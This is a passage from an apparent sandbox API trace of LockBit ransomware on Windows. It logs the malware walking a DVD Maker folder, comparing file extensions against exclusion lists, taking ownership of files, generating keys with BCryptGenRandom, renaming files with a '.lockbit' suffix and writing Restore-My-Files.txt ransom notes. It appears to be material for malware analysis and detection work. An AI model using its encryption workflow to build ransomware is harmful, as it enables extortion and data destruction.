param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.744] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.744] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722d79a4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722d79a4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea22689, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x643e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_frame-shadow.png", cAlternateFileName="")) returned 1 [0084.744] lstrcmpiW (lpString1=".", lpString2="Pets_frame-shadow.png") returned -1 [0084.744] lstrcmpiW (lpString1="..", lpString2="Pets_frame-shadow.png") returned -1 [0084.744] PathFindExtensionW (pszPath="Pets_frame-shadow.png") returned=".png" [0084.744] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.744] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.744] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.744] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.744] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.745] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.745] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.745] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.746] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.746] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.747] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_frame-shadow.png") returned 1 [0084.747] lstrcmpiW (lpString1="ntldr", lpString2="Pets_frame-shadow.png") returned -1 [0084.747] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_frame-shadow.png") returned -1 [0084.747] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_frame-shadow.png") returned -1 [0084.747] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_frame-shadow.png") returned -1 [0084.747] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_frame-shadow.png") returned 1 [0084.747] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_frame-shadow.png") returned -1 [0084.747] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.747] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png") returned=".png" [0084.747] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.747] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.747] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.747] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.748] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.748] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.748] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png.lockbit") returned 79 [0084.748] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.749] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.749] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.749] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.749] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.750] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.750] RtlFreeAnsiString (AnsiString="\\") [0084.750] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.750] malloc (_Size=0x200) returned 0x77d800 [0084.750] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.750] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.750] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.750] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.751] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.751] CloseHandle (hObject=0x3b4) returned 1 [0084.751] free (_Block=0x77d800) [0084.751] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.751] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.752] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.752] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=25662) returned 1 [0084.752] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.752] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.753] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.757] malloc (_Size=0xb4) returned 0x1ff1e60 [0084.758] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0084.760] free (_Block=0x1ff1e60) [0084.760] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.760] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.760] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.760] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724eccba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724eccba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_image-frame-backglow.png", cAlternateFileName="")) returned 1 [0084.760] lstrcmpiW (lpString1=".", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.760] PathFindExtensionW (pszPath="Pets_image-frame-backglow.png") returned=".png" [0084.760] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.760] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.760] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.761] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.761] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.762] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_image-frame-backglow.png") returned 1 [0084.762] lstrcmpiW (lpString1="ntldr", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.762] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.762] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_image-frame-backglow.png") returned 1 [0084.762] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_image-frame-backglow.png") returned -1 [0084.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png") returned=".png" [0084.762] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.762] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.762] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.762] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.763] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.763] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.763] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.763] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.763] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.763] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png.lockbit") returned 87 [0084.763] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.764] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.764] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.764] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.764] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.764] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.764] RtlFreeAnsiString (AnsiString="\\") [0084.764] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.765] malloc (_Size=0x200) returned 0x77d800 [0084.765] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.765] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.765] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.765] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.765] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.765] CloseHandle (hObject=0x3b4) returned 1 [0084.765] free (_Block=0x77d800) [0084.765] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.766] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.766] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.766] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=6166) returned 1 [0084.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.767] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.777] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.777] malloc (_Size=0xc4) returned 0x1ff1e60 [0084.778] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0084.778] free (_Block=0x1ff1e60) [0084.778] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.778] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.778] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.778] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724eccba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724eccba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1f0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_image-frame-border.png", cAlternateFileName="")) returned 1 [0084.778] lstrcmpiW (lpString1=".", lpString2="Pets_image-frame-border.png") returned -1 [0084.778] lstrcmpiW (lpString1="..", lpString2="Pets_image-frame-border.png") returned -1 [0084.778] PathFindExtensionW (pszPath="Pets_image-frame-border.png") returned=".png" [0084.778] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.778] lstrcmpiW (lpString1=".theme", 